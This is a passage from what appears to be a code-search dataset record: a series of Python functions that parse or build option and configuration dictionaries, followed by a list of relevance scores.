# here TCP_OPT_NOP is saved only once, even though multiple TCP_OPT_NOP might be present\n # since it doesn't affect our operations, or at least I couldn't think of one, so it's okay to overwrite it\n opts[opt] = value\n return opts", "def to_dict(self) -> dict:\n\n value_list = []\n if self.list_values:\n for value in self.list_values:\n if isinstance(value, dict):\n value_list.append(value)\n elif isinstance(value, PicklistValue):\n value_list.append(value.to_dict())\n else:\n raise TypeError(f\"Invalid type for `list_values` in Picklist.to_dict:\"\n f\"{type(self.list_values)}, {self.list_values}\")\n\n output = {\n \"list_name\": self.list_name.__str__(),\n \"list_values\": value_list,\n \"last_modified\": self.last_modified.timestamp() * 1000 # JS timestamps are in ms\n }\n\n return output", "def __parse_options_dict(options_str):\n # type: (str) -> Dict[str, str]\n opts = options_str.split('&') # type: List[str]\n res = {} # Type: Dict\n\n for opt in opts:\n key, value = opt.split('=') # type: List[str, str]\n res[key] = value # type: str\n\n return res", "def options(self):\n result = []\n for typ in type(self).mro():\n result.extend(k for k, v in typ.__dict__.items()\n if isinstance(v, Option))\n return dict((o, getattr(self, o)) for o in result)", "def dict_option(s):\n return _convert(s, (dict,))", "def _get_options(self) -> Dict[str, Any]:\n # TODO: handle holidays as well\n return {\n \"growth\": self.growth,\n \"changepoints\": self.changepoints and list(self.changepoints.astype('str')),\n \"n_changepoints\": self.n_changepoints,\n \"changepoint_range\": self.changepoint_range,\n \"changepoint_prior_scale\": self.changepoint_prior_scale,\n \"mcmc_samples\": 
self.mcmc_samples,\n \"interval_width\": self.interval_width,\n \"uncertainty_samples\": self.uncertainty_samples,\n \"yearly_seasonality\": self.yearly_seasonality,\n \"weekly_seasonality\": self.weekly_seasonality,\n \"daily_seasonality\": self.daily_seasonality,\n \"seasonality_mode\": self.seasonality_mode,\n \"seasonality_prior_scale\": self.seasonality_prior_scale,\n\n \"seasonalities\": self.seasonalities,\n \"extra_regressors\": self.extra_regressors\n }", "def asdict(self) -> dict[str, Any]:\n return {\n w.name: getattr(w, \"value\", None)\n for w in self._list\n if w.name and not w.gui_only\n }", "def initoptionsdict(cls):\n for i in range(len(clslist)):\n optionsdict.update(dict({clslist[i]: dict({'OPTIONS': dict()})}))", "def _parse_options(options):\n opts = dict()\n for attr in dir(options):\n if attr.startswith(\"__\"):\n continue\n opts[attr] = getattr(options, attr)\n return opts", "def to_dict(self, options={}):\n element_list = [cur_element.to_dict(options) for cur_element in self.geometry_list]\n result = {'elements': element_list}\n return result", "def to_dict(self) -> List[Dict[str, Any]]:\n return [x.to_dict() for x in self.inputs]", "def transform_list_to_dict(list):\n\n ret = {}\n\n for value in list:\n if isinstance(value, dict):\n ret.update(value)\n else:\n ret[str(value)] = True\n\n return ret", "def get_options(self):\n additional_data = self.get_additional_data()\n options_out = []\n for key, value in additional_data['DIMENSION_VALUES'].items():\n key_label = ' '.join(key.split('_')).strip().title()\n data = {'specification': key_label, 'specification_key': key, 'choices': value}\n options_out.append(data)\n return options_out", "def get_options(self):\r\n return self._option_values", "def _parse_arg_list(self):\n\t\targ_list = {}\n\t\tfor arg in getopt.getopt(sys.argv[1:], 'c:r:j:d')[0]:\n\t\t\targ_list[arg[0][1:]] = arg[1]\n\t\n\t\treturn arg_list", "def options(self):\n options = {\n o.name: getattr(self, o.name)\n for o in _OPTIONS\n }\n return options", "def to_dict(self) -> List[Dict[str, Any]]:\n return [x.to_dict() for x in self.params]", "def _section_as_dict(self, section):\n options = {}\n if not self.parser.has_section(section):\n return options\n for option in self.parser.options(section):\n # Don't know which options might be boolean so we can't use\n # self.parser.getboolean()\n tmp = self.get(section, option)\n if str(tmp).lower() in ['yes', 'y', 'true', 't']:\n options[option] = True\n elif str(tmp).lower() in ['no', 'n', 'false', 'f']:\n options[option] = False\n else:\n options[option] = str(tmp)\n return options", "def get_options(self):\n options = dict()\n while True:\n line = self.rfile.readline().decode(\"utf8\").strip()\n if not line:\n break\n self.log.debug(\"Got line: %s\", line)\n if \":\" not in line:\n self.log.debug(\"Invalid option: %s\", line)\n error_msg = \"header not in 'Name: value' format\"\n raise oa.errors.InvalidOption(error_msg)\n name, value = line.split(\":\", 1)\n options[name.lower()] = value.strip()\n return options", "def _extract_options(config, options, *args):\n extract = {}\n for key in args:\n if key not in args:\n continue\n extract[key] = config[key]\n option = getattr(options, key, None)\n if option is not None:\n extract[key] = option\n return extract", "def list_flattened_to_dict(self, listH, defaultItem={}):\n dictList = defaultItem\n for name in reversed(listH):\n dictList = {name: dictList}\n return dictList", "def arglist_parse_to_dict(arg_l):\n\n prop_d = {}\n for prop in arg_l:\n if len(prop) 
== 2:\n prop_l = prop\n elif ':' in prop:\n prop_l = prop.split(':')\n elif '=' in prop:\n prop_l = prop.split('=')\n else:\n exit( \"==> ERROR: invalid config. Use '=' or ':'.\" )\n if not len(prop_l) == 2:\n exit( \"==> ERROR: invalid config. Use one '=' per setting.\" )\n prop_d[prop_l[0]] = prop_l[1]\n return prop_d", "def options(request):\n return {option.name: option.get_value() for option in Option.objects.all()}", "def get_options():\n user_options = {}\n user_options['surface'] = {'label': 'Surface',\n 'type': 'stringList',\n 'default': 'bcc100',\n 'values': surface_selections}\n\n user_options['metal'] = {'label': 'Metal',\n 'type': 'string',\n 'default': 'Au'}\n\n user_options['a'] = {'label': 'Lattice Constant',\n 'type': 'float',\n 'precision': 3,\n 'suffix': 'Å'}\n\n user_options['size-x'] = {'label': 'Size X',\n 'type': 'integer',\n 'default': 5}\n\n user_options['size-y'] = {'label': 'Size Y',\n 'type': 'integer',\n 'default': 5}\n\n user_options['size-z'] = {'label': 'Size Z',\n 'type': 'integer',\n 'default': 3}\n\n user_options['vacuum'] = {'label': 'Vacuum distance',\n 'type': 'float',\n 'precision': 1,\n 'suffix': 'Å'}\n\n user_options['orthogonal'] = {'label': 'Orthogonal',\n 'type': 'stringList',\n 'default': 'True',\n 'values': ['True', 'False']}\n\n return {'userOptions': user_options }" ]
[ "0.6948613", "0.661204", "0.6580496", "0.65647084", "0.65088916", "0.6373278", "0.6370471", "0.63431555", "0.6230479", "0.6225121", "0.61512506", "0.6135905", "0.60848534", "0.6042554", "0.6006351", "0.5991005", "0.59683454", "0.58970153", "0.5887909", "0.5887085", "0.58858395", "0.5838247", "0.5833166", "0.58187306", "0.58103573", "0.5793962", "0.5792967", "0.5757677", "0.5741917", "0.5666034" ]
0.6884359
1
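The opt_to_dict document above pairs each option token with its successor, so it handles both '--key=value' tokens and flag-only switches. A small worked example, assuming itertools is imported and using made-up SLURM-style options:

import itertools  # required by opt_to_dict

opts = ["-A", "proj1", "--time=00:10:00", "--exclusive"]
print(opt_to_dict(opts))
# {'-A': 'proj1', '--time': '00:10:00', '--exclusive': True}
# A value that looks like another option (or the trailing '--' sentinel)
# marks a flag-only switch as True; bare value tokens never become keys.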
Remove unwanted options from an option list.
def prune_option_list(opts, keys):
    opt_d = opt_to_dict(opts)
    for k in keys:
        if k in opt_d:
            del opt_d[k]
    return [k for item in opt_d.iteritems() for k in item]
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _sanitize(self, opts_list):\n for opt in opts_list:\n if len(opt.strip()) == 0:\n opts_list.remove(opt)\n return opts_list", "def remove_all(self):\n self._options.clear()\n self._programs.clear()", "def replace_unacceptable_options(options, is_request):\n newopts = []\n if is_request:\n valid = lambda _o: _o.valid_in_request()\n valid_multiple = lambda _o: _o.valid_multiple_in_request()\n else:\n valid = lambda _o: _o.valid_in_response()\n valid_multiple = lambda _o: _o.valid_multiple_in_response()\n last_number = 0\n for opt in sorted_options(options):\n delta = opt.number - last_number\n last_number = opt.number\n if not valid(opt):\n newopts.append(UnrecognizedOption.from_option(opt))\n elif (0 == delta) and not valid_multiple(opt):\n newopts.append(UnrecognizedOption.from_option(opt))\n else:\n newopts.append(opt)\n return newopts", "def cleanOptions(options):\r\n daemonize = options.pop('daemonize')\r\n _reload = options.pop('reload')\r\n dev = options.pop('dev')\r\n opts = []\r\n store_true = [\r\n '--nocache', '--global_cache', '--traceback', '--quiet', '--loud'\r\n ]\r\n store_false = []\r\n for key, value in options.iteritems():\r\n key = '--' + key\r\n if (key in store_true and value) or (key in store_false and not value):\r\n opts += [key, ]\r\n elif value:\r\n opts += [key, str(value)]\r\n return daemonize, _reload, opts", "def del_psana_options(self, keys):\n try:\n for key in keys:\n self._data.psana_cfg_dict.pop(key, None)\n except:\n print 'Invalid keys to remove from psana options:', keys", "def remove_state(self, state):\n if isinstance(self.options, list):\n self.options.remove(state)\n else:\n temp = list(self.options)\n temp.remove(state)\n self.options = tuple(temp)", "def removeOption(self, *args):\n return _libsbml.ConversionProperties_removeOption(self, *args)", "def remove_option(self, option):\n self.__options.pop(option)", "def remove_option_from_value(self, o):\n result = False\n for k in self._options:\n if self._options.get(k) == o:\n self._options.pop(k)\n result = True\n return result", "def remove_option(self, parts):\n body = ' '.join(parts)\n\n with self.voter_lock:\n option = self.results.get(body, None)\n\n if option is None:\n return 'Does not compute. 
Type \"ballot\" to see available options.'\n\n # Clear the votes for this option.\n self.results.pop(body)\n\n # Clear the votes from individual voter records\n for voter in self.voters.values():\n votes = voter['votes']\n\n while body in votes:\n votes.remove(body)\n\n return f'{option[\"name\"]} has been removed'", "def remove_option(self, label):\n del self._options[label]\n index = self._menu.index(label)\n self._menu.delete(index, index)", "def list_scrubber_opts():\n return [(g, copy.deepcopy(o)) for g, o in _scrubber_opts]", "def unregister_opts(self, opts, group=None):\n for opt in opts:\n self.unregister_opt(opt, group, clear_cache=False)", "def _unregister_opt(self, opt):\n if opt.dest in self._opts:\n del self._opts[opt.dest]", "def _remove_all(self):\n self._items.clear()\n self._listbox.delete(0, END)", "def _clean_args(sys_argv, args):\n # print(args.datadir)\n # print( os.path.abspath(os.path.expanduser(sys_argv[0])))\n # if sys_argv[0].startswith(\"_\") or not args.datadir == os.path.abspath(os.path.expanduser(sys_argv[0])):\n # print(\"aa\")\n base = [x for x in sys_argv if\n x.startswith(\"-\") or not args.datadir == os.path.abspath(os.path.expanduser(x))]\n # Remove installer only options we don't pass on\n base = [x for x in base if x not in set([\"--minimize-disk\"])]\n if \"--nodata\" in base:\n base.remove(\"--nodata\")\n else:\n base.append(\"--data\")\n return base", "def list_cleanup(self, data):\n for data_value in list(data):\n # TODO: Add DEBUG logging (?)\n for filter_key, filter_value in self.required.items():\n if filter_key in data_value.keys():\n if isinstance(filter_value, str) and self.exact_match:\n if data_value[filter_key] != filter_value:\n data.remove(data_value)\n break\n elif isinstance(filter_value, str) and (not self.exact_match):\n if data_value[filter_key] is None:\n data.remove(data_value)\n break\n if filter_value not in data_value[filter_key]:\n data.remove(data_value)\n break\n elif isinstance(filter_value, list) and self.exact_match:\n if data_value[filter_key] not in filter_value:\n data.remove(data_value)\n break\n elif isinstance(filter_value, list) and (not self.exact_match):\n if data_value[filter_key] is None:\n data.remove(data_value)\n break\n found_match = False\n for filter_value_item in filter_value:\n if filter_value_item in data_value[filter_key]:\n found_match = True\n if not found_match:\n data.remove(data_value)\n break\n else:\n self.logger.warning(msg=\"List_Cleanup: None of the cases matched. 
Data: %s Filter: %s\" % (data_value, self.filter))\n # TODO: Handle other possible cases\n else:\n self.logger.warning(msg=\"List_Cleanup: Filter key: %s not present in Data: %s\" % (filter_key, data_value))\n continue\n\n for data_value in list(data):\n # TODO: Add DEBUG logging (?)\n for filter_key, filter_value in self.excluded.items():\n if filter_key in data_value.keys():\n if isinstance(filter_value, str) and self.exact_match:\n if data_value[filter_key] == filter_value:\n data.remove(data_value)\n break\n elif isinstance(filter_value, str) and (not self.exact_match):\n if data_value[filter_key] is None:\n continue\n if filter_value in data_value[filter_key]:\n data.remove(data_value)\n break\n elif isinstance(filter_value, list) and self.exact_match:\n if data_value[filter_key] in filter_value:\n data.remove(data_value)\n break\n elif isinstance(filter_value, list) and (not self.exact_match):\n if data_value[filter_key] is None:\n continue\n found_match = False\n for filter_value_item in filter_value:\n if filter_value_item in data_value[filter_key]:\n found_match = True\n if found_match:\n data.remove(data_value)\n break\n else:\n self.logger.warning(msg=\"List_Cleanup: None of the cases matched. Data: %s Filter: %s\" % (data_value, self.filter))\n # TODO: Handle other possible cases\n else:\n self.logger.warning(msg=\"List_Cleanup: Filter key: %s not present in Data: %s\" % (filter_key, data_value))\n continue\n\n return data", "def buildWithout(self, mods):\n for modname in mods:\n try:\n self.optmodules.remove(modname)\n except:\n print \"\\n*** WARNING: \" + modname + \" not found in the list of modules from \" + self.name + \"!!\"\n print \"please recheck your config file: names are case-sensitive!!\"", "def _unsuppress_hidden(self):\n\n spa = [a for a in self._actions if isinstance(a, argparse._SubParsersAction)]\n assert len(spa) == 1\n spa = spa[0]\n for choices_action in spa._choices_actions:\n dest = choices_action.dest\n if choices_action.help == argparse.SUPPRESS:\n choices_action.help = spa.choices[dest].description", "def _validate_disabled_options(self, proposal) -> List[str]:\n if proposal.value is None or not proposal.value:\n return []\n proposal_diff = set(proposal.value).difference_update(set(self._options_labels))\n assert (\n not proposal_diff\n ), f\"Invalid passed options for 'disabled_options': {proposal_diff}\"\n return proposal.value", "def _CommonOptions(self, p):\n super()._CommonOptions(p, opt_v=False)", "def clean_up_dict(clean_dict, ignore_list):\n for i in ignore_list:\n clean_dict.pop(i, None)\n return clean_dict", "def test_removeFlagsSilently(self):\n self._flagsSilentlyTest('removeFlags', b'-FLAGS.SILENT')", "def check_options(self, options):\n return not any(not isinstance(element, str) for element in options)", "def exclude_list(self):\n pass", "def _filter_unused_argument_dash_m(self, arguments):\n return [argument for argument in arguments if argument != '-m']", "def remove_option(self, option):\n splitvals = option.split('/')\n section, key = \"/\".join(splitvals[:-1]), splitvals[-1]\n\n RawConfigParser.remove_option(self, section, key)\n self._dirty = True", "def prune_sidecar(self):\n short_fields = list(self.sidecar_template_short.keys())\n full_fields = list(self.sidecar_template)\n exclude_list = []\n for field, value in self.sidecar_template.items():\n if value:\n # check to make sure value isn't a list of null types\n # e.g. 
if value = [None, None, None] we don't want to include it.\n if type(value) is list:\n none_count = value.count(None)\n if len(value) == none_count:\n pass\n else:\n exclude_list.append(field)\n else:\n exclude_list.append(field)\n\n exclude_list = exclude_list + short_fields\n\n destroy_list = set(full_fields) - set(exclude_list)\n\n destroyed = []\n for to_be_destroyed in destroy_list:\n destroyed.append(self.sidecar_template.pop(to_be_destroyed))\n\n return destroyed", "def test_options_listed_in_build_options(self) -> None:\n testdir = os.path.join(self.unit_test_dir, '112 list build options')\n\n out = self.init(testdir)\n for line in out.splitlines():\n if line.startswith('Message: Build options:'):\n self.assertNotIn('-Dauto_features=auto', line)\n self.assertNotIn('-Doptional=auto', line)\n\n self.wipe()\n self.mac_ci_delay()\n\n out = self.init(testdir, extra_args=['-Dauto_features=disabled', '-Doptional=enabled'])\n for line in out.splitlines():\n if line.startswith('Message: Build options:'):\n self.assertIn('-Dauto_features=disabled', line)\n self.assertIn('-Doptional=enabled', line)\n\n self.setconf('-Doptional=disabled')\n out = self.build()\n for line in out.splitlines():\n if line.startswith('Message: Build options:'):\n self.assertIn('-Dauto_features=disabled', line)\n self.assertNotIn('-Doptional=enabled', line)\n self.assertIn('-Doptional=disabled', line)", "def deselect_all(self):\n if not self.is_multiple:\n raise NotImplementedError(\"You may only deselect all options of a multi-select\")\n\n for opt in self.browser.execute_script(self.SELECTED_OPTIONS, self.browser.element(self)):\n self.browser.raw_click(opt)" ]
[ "0.7164903", "0.62534535", "0.62313527", "0.6177054", "0.6156464", "0.61167467", "0.598523", "0.5968531", "0.5958963", "0.5934466", "0.5840218", "0.5644665", "0.5616773", "0.55490786", "0.55408776", "0.551189", "0.5459334", "0.54491204", "0.54466665", "0.54283345", "0.5392538", "0.5366404", "0.536355", "0.5344467", "0.53329617", "0.5325878", "0.53171146", "0.5312498", "0.53034884", "0.5288524" ]
0.7166121
0
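prune_option_list above composes with opt_to_dict and flattens the surviving pairs back into a list; note it relies on dict.iteritems, so as written it runs on Python 2 only. A hedged sketch with the same hypothetical options as before:

opts = ["-A", "proj1", "--time=00:10:00", "--exclusive"]
pruned = prune_option_list(opts, ["--time"])
# Surviving options come back as a flat key/value list, e.g.
# ['-A', 'proj1', '--exclusive', True]
# (pair order follows dict iteration order, and flag-only switches
# keep their boolean True marker rather than a string value).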
Make a paper plot for the Ohmic (or linear) mobility of the RTA, lowfield, and fulldrift solutions.
def linear_mobility_paperplot(fieldVector, df):
    vcm = np.array(fieldVector) * 1e-2
    lw = 1.5
    mu_1 = []
    mu_2 = []
    mu_3 = []
    meanE_1 = []
    meanE_2 = []
    meanE_3 = []
    for ee in fieldVector:
        chi_1_i = np.load(pp.outputLoc + 'Steady/' + 'chi_' + '1_' + "E_{:.1e}.npy".format(ee))
        chi_2_i = np.load(pp.outputLoc + 'Steady/' + 'chi_' + '2_' + "E_{:.1e}.npy".format(ee))
        chi_3_i = np.load(pp.outputLoc + 'Steady/' + 'chi_' + '3_' + "E_{:.1e}.npy".format(ee))
        mu_1.append(utilities.calc_linear_mobility(chi_1_i, df, ee) * 10 ** 4)
        mu_2.append(utilities.calc_linear_mobility(chi_2_i, df, ee) * 10 ** 4)
        mu_3.append(utilities.calc_linear_mobility(chi_3_i, df, ee) * 10 ** 4)
        meanE_1.append(utilities.mean_energy(chi_1_i, df))
        meanE_2.append(utilities.mean_energy(chi_2_i, df))
        meanE_3.append(utilities.mean_energy(chi_3_i, df))
    plt.figure(figsize=(2.05, 2.5))
    # ax = plt.axes([0.2, 0.19, 0.75, 0.76])
    ax = plt.axes([0.21, 0.19, 0.75, 0.75])
    mufac = 1000
    # mufac = 1000
    ax.plot(vcm, np.array(mu_3) / mufac, '-', linewidth=lw, label='Warm', color=warm_color)
    ax.plot(vcm, np.array(mu_2) / mufac, '--', linewidth=lw, label='Cold', color=cold_color)
    ax.plot(vcm, np.array(mu_1) / mufac, '--', linewidth=lw, label='RTA', color=rta_color)
    plt.xlim([0, np.max(fieldVector) / 100])
    plt.xlabel(r'Electric field ($\rm V \, cm^{-1}$)')
    # plt.ylabel(r'$\sigma^{\omega = 0}_{\parallel}$ ($\rm cm^2 \, kV^{-1}\, s^{-1}$)')
    plt.ylabel(r'DC mobility (1000 $\rm cm^2 \, V^{-1}\, s^{-1}$)')
    plt.ylim([0.8e4 / mufac, 2e4 / mufac])
    ax.locator_params(axis='x', nbins=6)
    # plt.legend(ncol=3, loc='lower center', frameon=False)
    plt.legend(frameon=False)
    plt.savefig(pp.figureLoc + 'linear_mobility2.png', dpi=600)

    plt.figure()
    lw = 2
    plt.plot(vcm, (np.array(meanE_1) - np.min(df['energy [eV]'])) * 1000, '-', linewidth=lw, label='RTA')
    plt.plot(vcm, (np.array(meanE_2) - np.min(df['energy [eV]'])) * 1000, '-', linewidth=lw, label='Cold ' + r'$e^{-}$')
    plt.plot(vcm, (np.array(meanE_3) - np.min(df['energy [eV]'])) * 1000, '-', linewidth=lw, label='Warm ' + r'$e^{-}$')
    plt.xlabel(r'Electric field [$kV/cm$]')
    plt.ylabel(r'Mean Energy [meV]')
    plt.title(pp.title_str)
    plt.savefig(pp.figureLoc + 'meanEnergy_vField.png', bbox_inches='tight', dpi=600)
    plt.legend(frameon=False)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def small_signal_mobility_paperplot(fieldVector, freqVector, df):\n vcm = np.array(fieldVector)*1e-2\n n = utilities.calculate_density(df)\n lw = 1.5\n fig, ax = plt.subplots()\n for freq in freqVector:\n cond = []\n mu_3 = []\n for ee in fieldVector:\n chi_3_i = np.load(pp.outputLoc + 'Steady/' + 'chi_' + '3_' + \"E_{:.1e}.npy\".format(ee))\n mu_3.append(utilities.calc_linear_mobility(chi_3_i, df, ee) * 10 ** 4)\n cond.append(np.load(pp.outputLoc + 'Small_Signal/' + 'cond_' + '3_' + \"f_{:.1e}_E_{:.1e}.npy\".format(freq, ee)))\n ax.plot(vcm, np.array(np.real(cond))/c.e/n*100**2, '-', label='{:.1f} GHz'.format(freq),linewidth=lw)\n ax.plot(vcm,mu_3,'-',label = 'Ohmic Mobility',linewidth=lw)\n plt.xlabel(r'Field ($\\rm V \\, cm^{-1}$)')\n plt.ylabel(r'AC Mobility ($\\rm cm^2 \\, V^{-1} \\, s^{-1}$)')\n plt.ylim([-0.05*np.max(mu_3),np.max(mu_3)*1.2])\n # ax.text(0.55, 0.95, textstr, transform=ax.transAxes, fontsize=8, verticalalignment='top', bbox=props)\n plt.legend(ncol=3,loc='lower center')\n plt.savefig(pp.figureLoc+'ac_mobility.png', bbox_inches='tight',dpi=600)\n\n\n plt.figure(figsize=(2.05, 2.5))\n ax = plt.axes([0.21, 0.19, 0.75, 0.75])\n i = 0\n for ee in fieldVector:\n colorList = [eq_color, med_color, high_color]\n cond = []\n cond_linear = []\n mu_3 = []\n for freq in freqVector:\n mu_3 = []\n chi_3_i = np.load(pp.outputLoc + 'Steady/' + 'chi_' + '3_' + \"E_{:.1e}.npy\".format(ee))\n mu_3.append(utilities.calc_linear_mobility(chi_3_i, df, ee) * 10 ** 4)\n cond.append(np.load(pp.outputLoc + 'Small_Signal/' + 'cond_' + '3_' + \"f_{:.1e}_E_{:.1e}.npy\".format(freq, ee)))\n cond_linear.append(np.load(pp.outputLoc + 'Small_Signal/' + 'linear_cond_' + '3_' + \"f_{:.1e}_E_{:.1e}.npy\".format(freq, ee)))\n ax.plot(freqVector, np.array(np.real(cond))/c.e/n*100**2/1000, '-',\n label='{:.0f} '.format(ee/100)+r'$\\rm V \\, cm^{-1}$', linewidth=lw, color=colorList[i])\n # ax.plot(freqVector, np.array(cond_linear)/c.e/n*100**2, '-.', label='E = {:.0f} L '.format(ee/100)+r'$V \\, cm^{-1}$',linewidth=lw,color = colorList[i])\n i = i + 1\n\n plt.xlabel(r'Frequency (GHz)')\n plt.ylabel(r'$\\Re(\\rm AC\\ mobility$) (1000 $\\rm cm^2 \\, V^{-1}\\, s^{-1}$)')\n # plt.ylim([-0.4*np.max(mu_3),np.max(mu_3)*1.2])\n plt.xscale('log')\n plt.legend(frameon=False)\n plt.ylim([0, 20])\n plt.xlim([freqs[0], freqs[-1]])\n # ax.text(0.55, 0.95, textstr, transform=ax.transAxes, fontsize=8, verticalalignment='top', bbox=props)\n ax.yaxis.set_major_formatter(FormatStrFormatter('%.0f'))\n plt.xlim([freqVector[0],freqVector[-1]])\n locmaj = matplotlib.ticker.LogLocator(base=10, numticks=6)\n ax.xaxis.set_major_locator(locmaj)\n locmin = matplotlib.ticker.LogLocator(base=10.0, subs=np.arange(2, 10) * .1,\n numticks=100)\n ax.xaxis.set_minor_locator(locmin)\n plt.savefig(pp.figureLoc+'Real_ac_mobility.png',dpi=600)\n\n fig, ax = plt.subplots()\n i = 0\n for ee in fieldVector:\n colorList = ['black', 'dodgerblue', 'tomato']\n cond = []\n cond_linear = []\n mu_3 = []\n\n for freq in freqVector:\n mu_3 = []\n chi_3_i = np.load(pp.outputLoc + 'Steady/' + 'chi_' + '3_' + \"E_{:.1e}.npy\".format(ee))\n mu_3.append(utilities.calc_linear_mobility(chi_3_i, df, ee) * 10 ** 4)\n cond.append(\n np.load(pp.outputLoc + 'Small_Signal/' + 'cond_' + '3_' + \"f_{:.1e}_E_{:.1e}.npy\".format(freq, ee)))\n cond_linear.append(np.load(\n pp.outputLoc + 'Small_Signal/' + 'linear_cond_' + '3_' + \"f_{:.1e}_E_{:.1e}.npy\".format(freq, ee)))\n\n ax.plot(freqVector, np.array(np.imag(cond)) / c.e / n * 100 ** 2, '-',\n label='{:.0f} '.format(ee 
/ 100) + r'$\\rm V \\, cm^{-1}$', linewidth=lw, color=colorList[i])\n # ax.plot(freqVector, np.array(cond_linear)/c.e/n*100**2, '-.', label='E = {:.0f} L '.format(ee/100)+r'$V \\, cm^{-1}$',linewidth=lw,color = colorList[i])\n\n i = i + 1\n plt.xlabel(r'Frequency ($\\rm GHz$)')\n plt.ylabel(r'$\\Im \\, [\\mu_{\\omega}]$ ($\\rm cm^2 \\, V^{-1}\\, s^{-1}$)')\n # plt.ylim([-0.4*np.max(mu_3),np.max(mu_3)*1.2])\n plt.xscale('log')\n plt.legend(frameon=False)\n # ax.text(0.55, 0.95, textstr, transform=ax.transAxes, fontsize=8, verticalalignment='top', bbox=props)\n plt.savefig(pp.figureLoc + 'Imag_ac_mobility.png', bbox_inches='tight', dpi=600)\n\n\n fig, ax = plt.subplots()\n i = 0\n for ee in fieldVector:\n colorList = ['black', 'dodgerblue', 'tomato']\n cond = []\n cond_linear = []\n mu_3 = []\n\n for freq in freqVector:\n mu_3 = []\n chi_3_i = np.load(pp.outputLoc + 'Steady/' + 'chi_' + '3_' + \"E_{:.1e}.npy\".format(ee))\n mu_3.append(utilities.calc_linear_mobility(chi_3_i, df, ee) * 10 ** 4)\n cond.append(\n np.load(pp.outputLoc + 'Small_Signal/' + 'cond_' + '3_' + \"f_{:.1e}_E_{:.1e}.npy\".format(freq, ee)))\n cond_linear.append(np.load(\n pp.outputLoc + 'Small_Signal/' + 'linear_cond_' + '3_' + \"f_{:.1e}_E_{:.1e}.npy\".format(freq, ee)))\n\n ax.plot(freqVector, np.array(np.arctan(np.imag(cond)/np.real(cond)))/np.pi, '-',\n label='{:.0f} '.format(ee / 100) + r'$\\rm V \\, cm^{-1}$', linewidth=lw, color=colorList[i])\n # ax.plot(freqVector, np.array(cond_linear)/c.e/n*100**2, '-.', label='E = {:.0f} L '.format(ee/100)+r'$V \\, cm^{-1}$',linewidth=lw,color = colorList[i])\n i = i + 1\n ax.yaxis.set_major_formatter(tck.FormatStrFormatter('%g $\\pi$'))\n ax.yaxis.set_major_locator(tck.MultipleLocator(base=1.0))\n plt.xlabel(r'Frequency ($\\rm GHz$)')\n plt.ylabel(r'AC Mobility Phase Angle (Radians)')\n # plt.ylim([-0.4*np.max(mu_3),np.max(mu_3)*1.2])\n plt.xscale('log')\n plt.legend()\n yloc = plt.MaxNLocator(6)\n ax.yaxis.set_major_locator(yloc)\n # ax.text(0.55, 0.95, textstr, transform=ax.transAxes, fontsize=8, verticalalignment='top', bbox=props)\n plt.savefig(pp.figureLoc + 'Phase_ac_mobility.png', bbox_inches='tight', dpi=600)", "def show_observables(rf, logical_pops_file='qubit_pop.dat',\n beta_pops_file='beta_pop.dat', exc_file='cavity_excitation.dat',\n pulse1_file='pulse1.dat', pulse2_file='pulse2.dat'):\n fig = plt.figure(figsize=(16,3.5), dpi=70)\n\n qubit_pop = np.genfromtxt(join(rf, logical_pops_file)).transpose()\n beta_pop = np.genfromtxt(join(rf, beta_pops_file)).transpose()\n exc = np.genfromtxt(join(rf, exc_file)).transpose()\n p1 = QDYN.pulse.Pulse.read(join(rf, pulse1_file))\n p2 = QDYN.pulse.Pulse.read(join(rf, pulse2_file))\n\n ax = fig.add_subplot(131)\n tgrid = qubit_pop[0] # microsecond\n ax.plot(tgrid, qubit_pop[1], label=r'00')\n ax.plot(tgrid, qubit_pop[2], label=r'01')\n ax.plot(tgrid, qubit_pop[3], label=r'10')\n ax.plot(tgrid, qubit_pop[4], label=r'11')\n ax.plot(tgrid, beta_pop[1], label=r'0010')\n ax.plot(tgrid, beta_pop[2], label=r'0001')\n analytical_pop = qubit_pop[1] + qubit_pop[2] + qubit_pop[3] \\\n + beta_pop[1] + beta_pop[2]\n ax.plot(tgrid, analytical_pop, label=r'ana. 
subsp.')\n ax.legend(loc='best', fancybox=True, framealpha=0.5)\n ax.set_xlabel(\"time (microsecond)\")\n ax.set_ylabel(\"population\")\n\n ax = fig.add_subplot(132)\n ax.plot(tgrid, exc[1], label=r'<n> (cav 1)')\n ax.plot(tgrid, exc[2], label=r'<n> (cav 2)')\n ax.plot(tgrid, exc[3], label=r'<L>')\n ax.legend(loc='best', fancybox=True, framealpha=0.5)\n ax.set_xlabel(\"time (microsecond)\")\n ax.set_ylabel(\"cavity excitation\")\n\n ax = fig.add_subplot(133)\n p1.render_pulse(ax, label='pulse 1')\n p2.render_pulse(ax, label='pulse 2')\n ax.legend(loc='best', fancybox=True, framealpha=0.5)\n\n #ax.set_xlim(-4, -1)", "def plot_tsnes():\n # Two environments (for main paper figure. All for final figure)\n ENVS = [\n \"BipedalWalker-v3\",\n #\"LunarLander-v2\",\n #\"Pendulum-v0\"\n \"Acrobot-v1\",\n #\"CartPole-v1\"\n ]\n ALGO_TYPES = [\n \"stablebaselines\",\n \"stablebaselines\",\n \"wann\",\n \"wann\",\n ]\n ALGO_NAMES = [\n \"A2C\",\n \"PPO\",\n \"NEAT\",\n \"CMAES\",\n ]\n ALGO_PRETTY_NAMES = [\n \"A2C\",\n \"PPO\",\n \"NEAT\",\n \"CMA-ES\"\n ]\n\n REWARD_SCALES = {\n \"Pendulum-v0\": [-1600, -200],\n \"Acrobot-v1\": [-500, -100],\n \"LunarLander-v2\": [-230, 200],\n \"BipedalWalker-v3\": [-100, 300],\n \"CartPole-v1\": [0, 500]\n }\n\n figure, axs = pyplot.subplots(\n figsize=[6.4 * 2, 4.8],\n nrows=2,\n ncols=4,\n gridspec_kw={'hspace': 0, 'wspace': 0},\n )\n\n for plot_i in range(2):\n env = ENVS[plot_i]\n reward_scale = REWARD_SCALES[env]\n for algo_i in range(len(ALGO_TYPES)):\n column_idx = (algo_i % 2) + plot_i * 2\n row_idx = 0 if algo_i <= 1 else 1\n ax = axs[row_idx, column_idx]\n algo_type = ALGO_TYPES[algo_i]\n algo_name = ALGO_NAMES[algo_i]\n algo_pretty_name = ALGO_PRETTY_NAMES[algo_i]\n\n experiment_glob = \"experiments/{}_{}_{}_*\".format(algo_type, env, algo_name)\n experiment_paths = glob(experiment_glob)\n tsnes = []\n rewards = []\n for experiment_path in experiment_paths:\n pivector_paths = glob(os.path.join(experiment_path, \"pivectors\", \"*\"))\n population_tsnes = []\n 